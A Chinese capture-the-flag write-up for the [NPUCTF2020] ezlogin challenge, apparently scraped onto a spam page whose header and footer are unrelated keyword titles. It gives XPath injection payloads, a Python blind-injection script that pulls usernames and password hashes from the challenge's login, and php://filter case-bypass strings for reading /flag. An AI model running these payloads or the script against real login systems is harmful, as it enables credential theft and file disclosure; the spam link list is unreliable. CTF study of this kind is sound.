当前位置: 首页 > news >正文

国家建设部网站百度大数据查询怎么用

国家建设部网站,百度大数据查询怎么用,手机版免费个人简历模板,什么软件可以发布做网站[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。 不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的,为啥有两个or呢 us…

[NPUCTF2020]ezlogin

打开界面

如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。

 

不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。

 这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢

username=' ' or count(/)=1 or 1='1 ' and password=1

false or true or true and false   ,如果是两个   false or true and false 不就是false了吗

这条命令是判断根目录有几个结点, 

通过不同的回显,这道题采用盲注的手段通过回显位来判断。

 

 

一、获取根目录名字


'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>

 二、获取根目录上面的目录个数

 依次类推就可以判断n次目录下面的 子目录

三、获取目录名字的长度

'or string-length(name(/*[1]))=4 or ' '='

这样xpath基本操作就都了解了

id:        'or substring(name(/root/accounts/user/*[1]), {}, 1)='{}'  or ''=''or     username:        substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''=''or password:         substring(name(/root/accounts/user/*[3]), {}, 1)='{}' or ''='

 

import requests
import re
import time
s = requests.session()
url ='http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php'
head ={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
flag =''
for i in range(1,100):for j in strs:r = s.post(url=url)token = find.findall(r.text)#猜测根节点名称#payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#猜测子节点名称# payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #猜测accounts的节点# payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #猜测user节点#payload_4 ="<username>'or substring(name(/root/accounts/user/*[3]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #跑用户名和密码# payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#print(payload_password)r = s.post(url=url,headers=head,data=payload_password)time.sleep(0.2)print(r.text)if "非法操作" in r.text:flag+=jprint(flag)breakif "用户名或密码错误!" in r.text:breakprint(flag)

一般都是md5存储数据的解密得到 

adm1n
gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f
 

有的时候会因为网络报错,加一个time.sleep就可以了。

进入后发现,file=可能有路径穿越漏洞,或者任意文件读取漏洞

然后下面base64解码得到,flag  in /flag

直接用filter读取协议试一下

phP://filter/convert.bAse64-encode/resource=/flag

PHP://filter/string.toupper/resource=/flag   转换为大写都可以绕过

 

 

http://www.ds6.com.cn/news/24649.html

相关文章:

  • 网站的ip地址是什么nba篮网最新消息
  • 政府做网站得物app的网络营销分析论文
  • 那个网站专做委外发手工yahoo搜索引擎入口
  • 东莞网站搭建邀请注册推广赚钱的app
  • 搜狐最大的门户网站互联网营销外包推广
  • 安康网站定制厂家网络营销专业是干什么的
  • 网站设计如何收费seo品牌
  • 做网站都要多少钱百度宣传推广费用
  • wordpress选择表比较好的网络优化公司
  • 什么样的彩票网站开发搭建公司才是靠谱的seo培训费用
  • 中山台州网站建设推广产品运营主要做什么
  • 精品课程网站建设的国内外现状seo专员岗位要求
  • 怎么做wordpress主题班级优化大师下载安装最新版
  • 江苏省住房和建设部网站seo排名技术教程
  • 网站哪个公司做的好seo服务公司怎么收费
  • 自己做网站还是开通阿里巴巴诚信通沈阳网站关键词优化公司
  • 做网站推广汉狮网络宁波seo外包优化
  • 局域网网站建设教程网站流量分析工具
  • 微信网站模块安卓优化
  • 网站建设策划模板下载淘宝运营培训班学费大概多少
  • 辽宁响应式网站建设价格百度官网首页下载
  • dedecms做地方网站seo优化顾问服务阿亮
  • 北京工作室网站建设培训网站排名
  • 个人可以做建站网站么免费外贸接单平台
  • 软件界面设计要求上海谷歌seo公司
  • 做网站开发要多久想做app推广项目在哪找
  • 国家企业信用信息官网宁波seo关键词优化报价
  • 做网站月薪两万百度怎样发布信息
  • 网站源码 带后台seo标题优化的心得总结
  • 企业年报查询官网入口长尾词seo排名优化